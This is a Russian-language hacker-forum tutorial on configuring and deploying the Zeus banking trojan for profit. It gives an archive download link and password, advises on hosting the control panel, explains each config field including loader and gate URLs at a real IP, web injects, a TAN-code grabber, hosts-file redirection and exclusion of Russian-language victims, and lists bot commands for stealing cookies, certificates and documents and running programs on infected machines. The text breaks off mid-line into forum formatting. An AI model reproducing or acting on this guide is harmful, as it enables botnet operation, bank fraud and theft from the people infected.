немного о Зевсе

[Friend]

В этой статье я расскажу как настроить и привести в проф пригодность такой инструмент как zeus. Трой очень популярный и довольно таки задроченный, но с него проще всего начать да и при наличии желания и прямых рух на нем можно не плохо заработать. (статья намбер 500 о нем, но еще раз изобрету велосипед)Пишу в первый раз так что не пинайте сильно))

И так, качаем архив: hXXp://www.sendspace.com/file/0s97o7
Пароль: csu
(1.2.10.1 - наиболее стабильная из паблик версий)
Здесь находится билд, конфиг, инжекты и админка.

Начнем с админки.

Вам нужно выбрать хост, не думаю что стоит сразу брать абузный за 150-300 баксов в месяц, если не занимаетесь этим всерьез.
Из фришных подходит 000webhost.com. Из недорогих платных посоветую Jino.ru. Сам тестил на нем, держался довольно долго, больше 2х недель, с онлайном 500-1000.

Заливаем админку. После чего создаем папку "_reports" в папке с админкой и ставим на нее права 777. Так же ставим 777 на папку system.
Далее переходим на "http://ваш_сайт/install", где появятся параметры установки. Тут все интуитивно понятно, кроме encryption_key. Это код для шифровки передачи данных между ботом и гейтом. Пишем от балды.

Установили.

Переходим к конфигу. В папке с билдером есть файл config.txt. Открываем. смотрим:

botnet "btn1"

- Имя вашего ботнета, может быть любое

timer_config 90 5

"90" - время, через которое ваш бот будет будет скачивать новый конфиг. "5" - через какое время будет скачивать если первая попытка не удалась.

timer_logs 40 5

"40" - время через которое ваш бот будет слать логи. "5" - если в первый раз не удалось.

url_config "http://sait.com/config.bin"

- путь до конфига вашего бота.

url_compip "http://myip.ru/get_ip.php"

- пусть на сайт, который сообщит айпи жертвы

encryption_key "123"

- тот самый ключ который мы вписывали при установке. Ключ в конфиге и админке должен совпадать.

blacklist_languages 1049

- здесь мы перечисляем коды языков тех стран, отчеты с которых мы не хотели бы получать

url_loader "http://77.78.239.141/bot.exe"

- путь до нашего бота

url_server "http://77.78.239.141/gate.php"

- путь к гейту

file_webinjects "webinjects.txt"

- файл с инжектами, должен находиться в папке с билдером

entry "AdvancedConfigs"
"http://sait2.com/config.bin"

- резервный путь к конфигу (на случай если ваш хост умер)

entry "WebFilters"

- в этом разделе мы указываем сайты для которых мы бы хотели бы получать отчеты в обязательном порядке. Если наоборот не хотели, то впререди ставим "!"
например

"!http://vkontakte.ru/*"

если нужно чтобы по каждому щелчку левой кнопки мыши по этому сайту отправлялся скрин - ставим "@"

entry "WebFakes"

- используем для подмены веб адресов
пример:

"http://www.google.com" "http://www.yahoo.com" "GP" "" ""

- в данном случае при открытии сайта google будет открываться yahoo (у меня почему то никогда не работало

entry "TANGrabber"

- грабит тан коды. Под ваши нужды пишем свои или заказываем у кодеров.

entry "DnsMap"

- прописываем строки которые нужно добавить в hosts (работает некорректно если больше 1 строки)
Пример:

127.0.0.1 microsoft.com

Закончили.
Запускаем билдер.
Жмем build config. сохраняем. Жмем build loader, сохраняем. Заливаем config.bin и bot.exe на хост.
Готово!
Скачиваем на виртуалку. Запускаем. Заходим в админку по адресу www.sait.com/cp.php
Бот должен появиться онлайн.
Если не появился - перепроверяем настройки. Так же не забываем ставить права 777 на config.bin.

Отчеты просматриваем, нажав Search in database и указав нужные нам параметры. В Scripts мы можем задавать комманды ботам. Вот список этих команд

lexec "C:\windows\system32\calc.exe" - откроет калькулятор на текущем пользователе(можно любую прогу запустить, калькулятор как пример)
resetgrab - повторное очищение кукисов, протектедсторедж
getmff - получить солфайлы с ботов
delmff - очистить солфайлы
getcert - получить сертификаты всех хранилишь
addsff "*.doc" - получить все док файлы бота
getfile "kkk.doc" - получить файл с бота

block_fake [URL-маска] - блокирует вызов любого URL-редиректа, URL-маска которого будет подходить под URL-маска этой команды.
unblock_fake [маска] - из списка заблокированных URL-редиректов будут удалены все URL-маски, которые будут подходить под URL-маску этой команды.
block_url - блокирует вызов любой URL, которая будет совпадать с URL-маской этой команды.
unblock_url - из списка заблокированных URL будут удалены все URL-маски, которые
будут подходить под URL-маску этой команды.
rexec загрузка с заменой бота и запуск
rexeci загрузка с заменой бота перезагрузка и запуск
lexec загрузка и запуск
lexeci загрузка перезагрузка и запуск
addsf рестарт бота
delsf самоудаление
getfile скачать файл с машины бота
upcfg - после получения команды, бот нем...OLOR=#ffffff](c) v1skas[/COLOR][/SIZE][/FONT]